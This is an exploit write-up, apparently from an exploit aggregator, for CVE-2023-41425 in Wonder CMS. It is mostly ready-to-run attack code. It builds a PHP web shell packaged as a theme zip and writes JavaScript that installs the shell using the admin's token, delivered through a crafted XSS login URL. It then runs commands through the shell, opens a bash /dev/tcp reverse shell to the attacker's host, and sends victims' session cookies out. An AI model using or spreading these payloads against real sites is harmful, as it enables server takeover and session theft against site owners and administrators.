Share
## https://sploitus.com/exploit?id=3A833277-4844-5F02-AFEF-5EA6BA8AC1AC
##############
Wonder CMS RCE
##############

|
| Description : XSS to RCE, Wonder CMS 3.2.0 <= 3.4.2
| Sources
|   - https://github.com/prodigiousMind/CVE-2023-41425/tree/main
|   - https://nvd.nist.gov/vuln/detail/CVE-2023-41425
|

***
RCE
***

.. code-block:: bash

  # Setting vars
  RHOST="http://host.com:80"
  LHOST="10.10.14.152"
  LPORT="4444"
  LPORTWEB="80"

  # Moving to a tmp dir
  cd $(mktemp -d)

  # Creating our evil theme zip file
  mkdir -p evil
  cat <<'EOF'>evil/evil.php
  <?=`$_GET[0]`;?>
  EOF

  zip -r evil.zip evil/

  # JS payload that will install the new theme
  cat <<EOF>xssrce.js
  var xhr=new XMLHttpRequest();
  xhr.open("GET", "${RHOST}/?installModule=http://${LHOST}:${LPORTWEB}/evil.zip&directoryName=whatever&type=themes&token=" + document.querySelectorAll('[name="token"]')[0].value, true);
  xhr.send();
  EOF

  # Print XSS url
  echo -e "\n# XSS RCE"
  cat <<EOF
  ${RHOST}/index.php?page=loginURL?"></form><script+src="http://${LHOST}:${LPORTWEB}/xssrce.js"></script><form+action="
  EOF

  # Starting a new web server to serve payloads
  sudo python3 -m http.server $LPORTWEB &

|

| After sending the RCE XSS to administrator we get the following http calls

.. code-block::

  10.129.252.14 - - [11/Aug/2024 18:42:26] "GET /xssrce.js HTTP/1.1" 304 -
  10.129.252.14 - - [11/Aug/2024 18:42:31] "GET /evil.zip HTTP/1.1" 200 -
  10.129.252.14 - - [11/Aug/2024 18:42:31] "GET /evil.zip HTTP/1.1" 200 -
  10.129.252.14 - - [11/Aug/2024 18:42:31] "GET /evil.zip HTTP/1.1" 200 -
  10.129.252.14 - - [11/Aug/2024 18:42:32] "GET /evil.zip HTTP/1.1" 200 -

|

| We can now make use of the php payload

.. code-block:: bash

  # id
  CMD="id"
  curl --path-as-is "${RHOST}/themes/evil/evil.php?0=$(echo -n "$CMD"| python3 -c "import urllib.parse,sys; print(urllib.parse.quote_plus(sys.stdin.read()))")"
  # uid=33(www-data) gid=33(www-data) groups=33(www-data)

  # Reverse shell, (don't forget to listen first: nc -nvlp 4444)
  CMD="bash -c 'bash -i >& /dev/tcp/${LHOST}/${LPORT} 0>&1'"
  curl --path-as-is "${RHOST}/themes/evil/evil.php?0=$(echo -n "$CMD"| python3 -c "import urllib.parse,sys; print(urllib.parse.quote_plus(sys.stdin.read()))")"

| 

*******
Cookies
*******

| You can also steal cookies (and therefore the php session)

.. code-block:: bash

  cat <<EOF>xsscookie.js
  var xhr=new XMLHttpRequest();
  xhr.open("GET", "http://${LHOST}:${LPORTWEB}/?"+document.cookie, true);
  xhr.send();
  EOF
  
  echo -e "\n# XSS Retrieve PHP session"
  cat <<EOF
  ${RHOST}/index.php?page=loginURL?"></form><script+src="http://${LHOST}:${LPORTWEB}/xsscookie.js"></script><form+action="
  EOF

|